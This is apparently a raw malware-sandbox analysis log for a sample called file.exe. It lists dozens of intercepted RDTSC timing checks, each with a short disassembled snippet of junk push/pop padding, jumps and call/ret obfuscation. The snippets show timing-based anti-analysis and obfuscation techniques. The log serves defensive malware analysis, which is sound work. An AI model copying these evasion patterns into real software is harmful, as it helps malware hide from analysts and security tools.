Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98CAE6 second address: 98CAEB instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98CDA4 second address: 98CDCB instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pushad 0x00000006 jmp 00007F8FA106A47Eh 0x0000000b pushad 0x0000000c popad 0x0000000d jns 00007F8FA106A476h 0x00000013 popad 0x00000014 push eax 0x00000015 push edx 0x00000016 jnc 00007F8FA106A476h 0x0000001c push eax 0x0000001d push edx 0x0000001e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98CDCB second address: 98CDCF instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98CDCF second address: 98CDD3 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98CF5F second address: 98CF69 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jbe 00007F8FA0CCCDD6h 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98D552 second address: 98D560 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push esi 0x00000005 pop esi 0x00000006 pop edx 0x00000007 popad 0x00000008 push eax 0x00000009 push edx 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d pop ebx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98D560 second address: 98D568 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 push eax 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98DAFB second address: 98DB00 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98DB00 second address: 98DB11 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 push edi 0x00000007 pop edi 0x00000008 push edx 0x00000009 pop edx 0x0000000a popad 0x0000000b pop edx 0x0000000c pop eax 0x0000000d pushad 0x0000000e pushad 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98DB11 second address: 98DB25 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 push edx 0x00000008 push eax 0x00000009 pop eax 0x0000000a jc 00007F8FA106A476h 0x00000010 pop edx 0x00000011 pushad 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98E467 second address: 98E470 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push eax 0x00000006 push edx 0x00000007 push esi 0x00000008 pop esi 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98E470 second address: 98E474 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98E5C1 second address: 98E60B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jl 00007F8FA0CCCDD6h 0x00000009 jmp 00007F8FA0CCCDE7h 0x0000000e jp 00007F8FA0CCCDD6h 0x00000014 jmp 00007F8FA0CCCDE5h 0x00000019 popad 0x0000001a push eax 0x0000001b push edx 0x0000001c jnp 00007F8FA0CCCDD6h 0x00000022 jo 00007F8FA0CCCDD6h 0x00000028 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 98E60B second address: 98E615 instructions: 0x00000000 rdtsc 0x00000002 je 00007F8FA106A476h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99505E second address: 995070 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA0CCCDDEh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9954B4 second address: 9954CC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA106A47Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push ecx 0x0000000b pop ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 995640 second address: 995679 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 pop eax 0x00000005 js 00007F8FA0CCCDD6h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e mov eax, dword ptr [esp+04h] 0x00000012 jnp 00007F8FA0CCCDE4h 0x00000018 mov eax, dword ptr [eax] 0x0000001a pushad 0x0000001b push eax 0x0000001c push edx 0x0000001d jmp 00007F8FA0CCCDDEh 0x00000022 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 995679 second address: 995683 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push ebx 0x00000009 pop ebx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 995683 second address: 995687 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 995687 second address: 9956A2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 mov dword ptr [esp+04h], eax 0x0000000b push eax 0x0000000c push edx 0x0000000d pushad 0x0000000e jp 00007F8FA106A476h 0x00000014 jo 00007F8FA106A476h 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99919D second address: 9991A3 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9991A3 second address: 9991A7 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9991A7 second address: 9991BB instructions: 0x00000000 rdtsc 0x00000002 je 00007F8FA0CCCDD6h 0x00000008 pushad 0x00000009 popad 0x0000000a pop edx 0x0000000b pop eax 0x0000000c jng 00007F8FA0CCCDE2h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9991BB second address: 9991C1 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9991C1 second address: 9991C5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9991C5 second address: 9991ED instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F8FA106A487h 0x00000009 jmp 00007F8FA106A47Dh 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9991ED second address: 9991F1 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99D010 second address: 99D02C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA106A487h 0x00000007 pushad 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 958A02 second address: 958A06 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99C4CF second address: 99C511 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA106A485h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c jnp 00007F8FA106A47Ch 0x00000012 jo 00007F8FA106A476h 0x00000018 push ebx 0x00000019 jmp 00007F8FA106A488h 0x0000001e pop ebx 0x0000001f rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99C511 second address: 99C51D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jnl 00007F8FA0CCCDD6h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99C51D second address: 99C521 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99CBC5 second address: 99CBC9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99CE84 second address: 99CEAD instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jmp 00007F8FA106A484h 0x0000000c jns 00007F8FA106A476h 0x00000012 push ebx 0x00000013 pop ebx 0x00000014 popad 0x00000015 pop edx 0x00000016 push ebx 0x00000017 push ebx 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99F591 second address: 99F5A7 instructions: 0x00000000 rdtsc 0x00000002 jbe 00007F8FA0CCCDDCh 0x00000008 jnp 00007F8FA0CCCDD6h 0x0000000e pop edx 0x0000000f pop eax 0x00000010 push eax 0x00000011 push edi 0x00000012 push eax 0x00000013 push edx 0x00000014 push esi 0x00000015 pop esi 0x00000016 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99FB8E second address: 99FB9E instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 push eax 0x00000009 push edx 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d pushad 0x0000000e popad 0x0000000f popad 0x00000010 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99FB9E second address: 99FBA4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edi 0x00000005 pop edi 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 99FBA4 second address: 99FBA8 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0001 second address: 9A0005 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0105 second address: 9A0110 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jc 00007F8FA106A476h 0x00000009 push eax 0x0000000a push edx 0x0000000b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0545 second address: 9A0549 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0549 second address: 9A054D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A060A second address: 9A060F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A060F second address: 9A0615 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A0672 second address: 9A0691 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 jmp 00007F8FA0CCCDE2h 0x0000000a popad 0x0000000b push eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 pop eax 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A2A2E second address: 9A2AB9 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA106A480h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop ecx 0x0000000a push eax 0x0000000b jmp 00007F8FA106A483h 0x00000010 nop 0x00000011 push 00000000h 0x00000013 push ebp 0x00000014 call 00007F8FA106A478h 0x00000019 pop ebp 0x0000001a mov dword ptr [esp+04h], ebp 0x0000001e add dword ptr [esp+04h], 0000001Dh 0x00000026 inc ebp 0x00000027 push ebp 0x00000028 ret 0x00000029 pop ebp 0x0000002a ret 0x0000002b and edi, 4E5E4D2Eh 0x00000031 push 00000000h 0x00000033 push 00000000h 0x00000035 push ebp 0x00000036 call 00007F8FA106A478h 0x0000003b pop ebp 0x0000003c mov dword ptr [esp+04h], ebp 0x00000040 add dword ptr [esp+04h], 0000001Ch 0x00000048 inc ebp 0x00000049 push ebp 0x0000004a ret 0x0000004b pop ebp 0x0000004c ret 0x0000004d push 00000000h 0x0000004f mov esi, dword ptr [ebp+122D373Ah] 0x00000055 xchg eax, ebx 0x00000056 push eax 0x00000057 push edx 0x00000058 pushad 0x00000059 pushad 0x0000005a popad 0x0000005b push eax 0x0000005c push edx 0x0000005d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A2AB9 second address: 9A2ABE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A4699 second address: 9A471B instructions: 0x00000000 rdtsc 0x00000002 je 00007F8FA106A48Bh 0x00000008 jmp 00007F8FA106A485h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f mov dword ptr [esp], eax 0x00000012 push 00000000h 0x00000014 push ecx 0x00000015 call 00007F8FA106A478h 0x0000001a pop ecx 0x0000001b mov dword ptr [esp+04h], ecx 0x0000001f add dword ptr [esp+04h], 00000018h 0x00000027 inc ecx 0x00000028 push ecx 0x00000029 ret 0x0000002a pop ecx 0x0000002b ret 0x0000002c mov dword ptr [ebp+122D3200h], ebx 0x00000032 push 00000000h 0x00000034 push 00000000h 0x00000036 push ebp 0x00000037 call 00007F8FA106A478h 0x0000003c pop ebp 0x0000003d mov dword ptr [esp+04h], ebp 0x00000041 add dword ptr [esp+04h], 0000001Dh 0x00000049 inc ebp 0x0000004a push ebp 0x0000004b ret 0x0000004c pop ebp 0x0000004d ret 0x0000004e push 00000000h 0x00000050 sub esi, 7880BD00h 0x00000056 push eax 0x00000057 jnl 00007F8FA106A480h 0x0000005d push eax 0x0000005e push edx 0x0000005f push eax 0x00000060 pop eax 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A671C second address: 9A6722 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A6722 second address: 9A6726 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A4E80 second address: 9A4E86 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push edx 0x00000005 pop edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A718B second address: 9A7220 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA106A481h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 nop 0x0000000a push 00000000h 0x0000000c push ebx 0x0000000d call 00007F8FA106A478h 0x00000012 pop ebx 0x00000013 mov dword ptr [esp+04h], ebx 0x00000017 add dword ptr [esp+04h], 0000001Bh 0x0000001f inc ebx 0x00000020 push ebx 0x00000021 ret 0x00000022 pop ebx 0x00000023 ret 0x00000024 or edi, 00809EA6h 0x0000002a adc di, 3974h 0x0000002f push 00000000h 0x00000031 push 00000000h 0x00000033 push eax 0x00000034 call 00007F8FA106A478h 0x00000039 pop eax 0x0000003a mov dword ptr [esp+04h], eax 0x0000003e add dword ptr [esp+04h], 0000001Bh 0x00000046 inc eax 0x00000047 push eax 0x00000048 ret 0x00000049 pop eax 0x0000004a ret 0x0000004b jmp 00007F8FA106A487h 0x00000050 mov dword ptr [ebp+122D1874h], ecx 0x00000056 push 00000000h 0x00000058 sub dword ptr [ebp+1247C29Ch], edx 0x0000005e xchg eax, ebx 0x0000005f push eax 0x00000060 push edx 0x00000061 push eax 0x00000062 push edx 0x00000063 push edi 0x00000064 pop edi 0x00000065 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A7220 second address: 9A7233 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA0CCCDDFh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A6EEB second address: 9A6EF5 instructions: 0x00000000 rdtsc 0x00000002 jns 00007F8FA106A47Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A7233 second address: 9A725E instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA0CCCDE3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a push eax 0x0000000b push edx 0x0000000c jmp 00007F8FA0CCCDE1h 0x00000011 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A94D9 second address: 9A951B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA106A480h 0x00000007 jmp 00007F8FA106A482h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f pushad 0x00000010 popad 0x00000011 jmp 00007F8FA106A485h 0x00000016 pop eax 0x00000017 pushad 0x00000018 push eax 0x00000019 push edx 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A9C1D second address: 9A9C21 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A9C21 second address: 9A9C25 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9A9C25 second address: 9A9C3F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 popad 0x00000007 push eax 0x00000008 pushad 0x00000009 jmp 00007F8FA0CCCDDDh 0x0000000e push eax 0x0000000f push edx 0x00000010 pushad 0x00000011 popad 0x00000012 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AA406 second address: 9AA420 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA106A483h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AC703 second address: 9AC707 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AD6E6 second address: 9AD700 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA106A486h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AC94C second address: 9AC952 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AD700 second address: 9AD70A instructions: 0x00000000 rdtsc 0x00000002 je 00007F8FA106A47Ch 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9AF97F second address: 9AF984 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B0BED second address: 9B0C5F instructions: 0x00000000 rdtsc 0x00000002 jc 00007F8FA106A476h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b nop 0x0000000c mov ebx, 37B4CB46h 0x00000011 push dword ptr fs:[00000000h] 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F8FA106A478h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 00000016h 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 mov ebx, dword ptr [ebp+122D3412h] 0x00000038 mov dword ptr fs:[00000000h], esp 0x0000003f mov ebx, dword ptr [ebp+122D199Ah] 0x00000045 mov eax, dword ptr [ebp+122D12EDh] 0x0000004b jmp 00007F8FA106A47Ch 0x00000050 push FFFFFFFFh 0x00000052 mov edi, dword ptr [ebp+12461EB5h] 0x00000058 nop 0x00000059 pushad 0x0000005a push eax 0x0000005b push edx 0x0000005c jmp 00007F8FA106A47Bh 0x00000061 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B1BC9 second address: 9B1BCD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B0C5F second address: 9B0C82 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jo 00007F8FA106A487h 0x0000000c jmp 00007F8FA106A481h 0x00000011 popad 0x00000012 push eax 0x00000013 push ebx 0x00000014 push ecx 0x00000015 push eax 0x00000016 push edx 0x00000017 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B3C85 second address: 9B3C8B instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B3C8B second address: 9B3C8F instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B3C8F second address: 9B3C9D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c push esi 0x0000000d pop esi 0x0000000e rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B5CE0 second address: 9B5CE5 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop esi 0x00000005 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B3C9D second address: 9B3CB6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F8FA0CCCDE2h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pushad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B5CE5 second address: 9B5CEB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B5CEB second address: 9B5CEF instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B5CEF second address: 9B5D3D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 mov dword ptr [esp], eax 0x0000000b and di, 1A20h 0x00000010 push 00000000h 0x00000012 mov edi, edx 0x00000014 push 00000000h 0x00000016 push 00000000h 0x00000018 push edx 0x00000019 call 00007F8FA106A478h 0x0000001e pop edx 0x0000001f mov dword ptr [esp+04h], edx 0x00000023 add dword ptr [esp+04h], 00000014h 0x0000002b inc edx 0x0000002c push edx 0x0000002d ret 0x0000002e pop edx 0x0000002f ret 0x00000030 xchg eax, esi 0x00000031 pushad 0x00000032 push ecx 0x00000033 jmp 00007F8FA106A485h 0x00000038 pop ecx 0x00000039 pushad 0x0000003a push eax 0x0000003b push edx 0x0000003c rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B5D3D second address: 9B5D43 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B6C08 second address: 9B6C47 instructions: 0x00000000 rdtsc 0x00000002 js 00007F8FA106A478h 0x00000008 push edx 0x00000009 pop edx 0x0000000a pop edx 0x0000000b pop eax 0x0000000c nop 0x0000000d push 00000000h 0x0000000f sub dword ptr [ebp+124538A6h], esi 0x00000015 push 00000000h 0x00000017 push 00000000h 0x00000019 push esi 0x0000001a call 00007F8FA106A478h 0x0000001f pop esi 0x00000020 mov dword ptr [esp+04h], esi 0x00000024 add dword ptr [esp+04h], 00000016h 0x0000002c inc esi 0x0000002d push esi 0x0000002e ret 0x0000002f pop esi 0x00000030 ret 0x00000031 or bl, FFFFFF9Bh 0x00000034 xchg eax, esi 0x00000035 push eax 0x00000036 push edx 0x00000037 push eax 0x00000038 push edx 0x00000039 pushad 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B6C47 second address: 9B6C4D instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B8EBA second address: 9B8EE3 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F8FA106A47Bh 0x00000008 jns 00007F8FA106A476h 0x0000000e popad 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push eax 0x00000013 push edx 0x00000014 jmp 00007F8FA106A47Fh 0x00000019 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9B8EE3 second address: 9B8EE9 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BAF6F second address: 9BAF7C instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 pop edi 0x00000006 push eax 0x00000007 push eax 0x00000008 push edx 0x00000009 push eax 0x0000000a push edx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BAF7C second address: 9BAF80 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe	RDTSC instruction interceptor: First address: 9BAF80 second address: 9BAF86 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 pop ecx 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
